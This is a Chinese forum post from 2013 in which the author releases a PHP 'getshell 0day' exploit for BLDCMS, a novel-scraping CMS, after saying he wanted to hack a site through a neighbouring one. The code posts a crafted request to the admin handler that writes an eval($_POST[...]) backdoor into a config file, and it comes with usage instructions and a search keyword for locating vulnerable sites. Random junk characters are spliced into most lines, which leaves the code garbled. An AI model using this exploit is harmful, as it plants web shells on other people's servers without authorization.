之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
! j. n. k, N1 U+ [: n D/ m7 v$ {( H( A1 }7 |, ]* C: j; X }
( @4 {0 w7 f& q0 P, E H" @
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 ) A9 B3 q1 Z/ y" D" P" v2 U1 z
$ V- t6 o* Z# Q既然都有人发了 我就把我之前写好的EXP放出来吧
; C7 N8 E* x$ ^8 j ! ]6 {3 ~- ^# ?/ q
view source print?01.php;">
3 Y5 N3 K7 A* B* r# u02.<!--?php
/ i& A2 L! a" q* ]03.echo "-------------------------------------------------------------------
$ P" h2 u' w) s04. " [. c4 k' h1 v2 w* \5 C, I- A
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
9 e& P2 Q% b3 I, F3 |3 h3 Y- o06. Z! ?& l# C, C9 N
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun" h( y. o0 Y0 F4 a
08. " Z- e0 _" h+ c# F& d4 \
09.QQ:981009941\r\n 2013.3.21\r\n 2 ^: k% u, Q- X! `. U1 E
10. % M7 X$ F, K0 Q& e' g) F. E/ ~5 c
11. 9 w1 B* B% ^! b
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码 S8 T: D! h( v8 q* ?2 `- B
13. % F* S* N" M" W" u
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------* [" \% q$ w8 b, O& @
15.
4 m* V3 d3 z# q# j16.--------------------------------------------------------------------\r\n";
' R: Z0 W5 W$ o. H6 @) z5 @17.$url=$argv[1];7 d5 i8 M% N ?- W( e
18.$dir=$argv[2]; V0 q- r \ p* a6 _7 ?
19.$pass=$argv[3];" d j) l" h& u) G0 V
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';% }* P9 }* T* u1 t) [5 p! {
21.if (emptyempty($pass)||emptyempty($url))9 s8 F: t* q- H; L7 d e& i
22.{exit("请输入参数");}
5 n2 ]% Q2 U0 q$ Z23.else
, \! q( Q5 }( I9 B5 U* K7 M24.{
5 W; l) h- F3 y, B25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
/ m7 ~: P( B m0 N26. 0 L1 z- r0 U. }7 t
27.al;8 G) R( O# }, l7 z
28.$length = strlen($fuckdata);
" w Y6 s, B1 l1 O% a s29.function getshell($url,$pass)* k& T B) |( A9 o C/ l! D0 s
30.{; l/ B$ `1 D! g) ^
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
% [1 b6 `' v; B! D! m) C32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
* b0 a6 g h6 O/ x9 u; V33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n"; E) G! P) V6 X" W( U/ U; U
34.$header .= "User-Agent: MSIE\r\n";
+ M+ ?9 @ J" |6 O35.$header .= "Host:".$url."\r\n";3 f" P, N5 L# ?: e W
36.$header .= "Content-Length: ".$length."\r\n";( F3 g" L) r5 L V6 @, X+ b
37.$header .= "Connection: Close\r\n";
7 R8 Y1 O& ?$ P) p38.$header .="\r\n";* N% K$ G U/ A, {
39.$header .= $fuckdata."\r\n\r\n";
4 P* J* L0 z D2 k40.$fp = fsockopen($url, 80,$errno,$errstr,15);5 o; F! c! {( c4 K0 G
41.if (!$fp)) w6 j D! L$ g
42.{
$ ]. z2 p5 w% N6 z0 l43.exit ("利用失败:请检查指定目标是否能正常打开");* W# h& W) B9 o- t j
44.}
/ V1 S1 W; H" B$ w) y: _45.else{ if (!fputs($fp,$header)); V9 _/ P8 Q& D2 a" |0 K5 s& o
46.{exit ("利用失败");}, x) q/ z7 u6 N, f! H! n
47.else
5 L( x5 V: z) m5 z5 m& f$ o9 w5 E48.{2 |5 p9 ?$ q- E" w+ B2 j* ~' r8 N8 {) H
49.$receive = '';: ^2 c! m8 c! r; N& ]- p* W
50.while (!feof($fp)) {+ ^ B* l& r% q8 S9 ~* `
51.$receive .= @fgets($fp, 1000);
8 F& n0 I* U% ~7 j, N, b, @# v( l52.}- G) E. Z: j: w$ o- T
53.@fclose($fp);: |( X+ K, P9 ?7 e( {# s
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标6 s( v% n. o. E6 l
55.
8 R& B" |" W+ e5 @. G56.GPC是否=off)";0 X9 \. ~7 ^, d3 `( n
57.}}
! Y; R- Y$ t: u3 i/ o# V0 w5 O6 f* D58.}4 @$ [+ L) p: y- v. J5 p, B+ r
59.}
2 y6 ]) z; S7 m! L' V60.getshell($url,$pass);- {; } ~3 }+ |; K/ b
61.?-->
9 C' @: q3 A% Y$ S- Q- A$ x - I0 N6 L% ~& g% v
9 |& t# f! i/ i& u
" R3 v d/ l" K- Q
by 数据流
8 e8 D& n& ^9 ~; U2 a |
发表于 2013-3-26 20:49:10
收藏
支持
反对